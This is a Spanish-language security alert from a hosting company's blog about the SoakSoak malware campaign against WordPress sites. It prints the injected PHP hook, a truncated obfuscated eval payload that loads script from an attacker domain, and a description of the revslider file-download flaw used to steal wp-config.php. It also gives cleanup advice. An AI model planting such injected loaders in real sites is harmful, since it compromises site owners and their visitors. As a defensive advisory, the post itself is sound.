Hace horas que se está reportando que hay decenas de miles de sitios WordPress comprometidos por infección del malware conocido como SoakSoak.
Una vez más... Es que no me gustan los CMS gratuitos condicionados por las múltiples vulnerabilidades de los plugin desarrollados por terceros (nunca sabemos con que intenciones) que incluso siendo plugins éticos y de gran utilidad pueden tener agujeros de seguridad usados por los hackers para reventar los sitios web.
Muchos usuarios se están enterando cuando los sistemas de detección de Google no dejan acceder a sus sitios, pero es un aviso para todos.
Lo que sucede es que el atacante accede al fichero wp-includes/template-loader.php e incluye lo siguiente:.
<?php
function FuncQueueObject()
{
wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", "FuncQueueObject");
Esto provoca que se añada lo siguiente al archivo wp-includes/js/swobject.js:
eval( decode URI C0mponent(" %28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));
Este malware, al descodificarse, carga un malware en javascript desde el dominio (Soak Soak. ru), en concreto este archivo: hXXp:// soaksoak. ru/ xteas /code.
Si ya estás infectado la solución de urgencia es sustituir los archivos comprometidos por unos limpios descargados desde WordPress.org, para a continuación cargar una versión completa limpia tanto de WordPress como de plugins y temas.
Una vez hecho esto, ahora sí, instala algún plugin de seguridad como WordFence o el que más te guste, pero que tenga firewall integrado y detección temprana de archivos modificados.
Si quieres comprobar si estás infectado prueba en este comprobador de seguridad online gratuito.
Más de 100.000 páginas infectadas en pocas horas.
WordPress es posiblemente la plataforma de blogs más popular de todo el planeta, y como tal, es objeto de ciber-ataques todos los días. El ataque detectado debido a un malware conocido como SoakSoak está causando estragos entre los usuarios de esta plataforma y ya ha afectado a más de 100.000 páginas web. Se detecto el pasado domingo y va a más. No es de extrañar que con más de 70 millones de webs WordPress en Internet y por lo tanto más de 70 millones de víctimas potenciales, el número siga en aumento
Suponemos que los responsables de WordPress ya trabajan en una actualización que impida la instalación del malware. Los usuarios que tengan un Firewall o Proxy están protegidos
Todas las páginas web afectadas han comenzado a mostrar un comportamiento extraño con redirecciones inesperadas a SoakSoak.ru. También se han detectado casos de descarga de ficheros maliciosos en los ordenadores que habían accedido a estos portales. Google ya ha bloqueado por este motivo a 11.000 páginas web de todo el mundo.
Según datos recogidos de esta plataforma el malware viene debido a una vulnerabilidad en el modulo revslider (Slider Revolution Premium WordPress Plugin) con el que referente a un fallo de seguridad se pueden descargar cualquier fichero de WordPress, pudiéndose descargar el fichero wp-config.php y así tener acceso a la base de datos donde esta instalado nuestro CMS.
El mejor remedio es la prevención.
Se han puesto en contacto con mmteam.controldedominios.com en estas últimas horas varias personas propietarias de páginas en WordPress víctimas del malware de SoakSoak. Otro ataque masivo a este gestor de contenido. Recomendamos usar el plugin de WordPressA Security Plugin para estar prevenidos y avisados de las vulnerabilidades que pueden contener los plugins instalados en tus WordPress.
Siempre agradecemos que compartas nuestros post para su mayor difusión pero en este caso es por el bien común. No dejes de compartir y dar alcance a este post,
Un saludo y gracias.
Equipo de desarrollo de Multimedia Team - controldedominios.com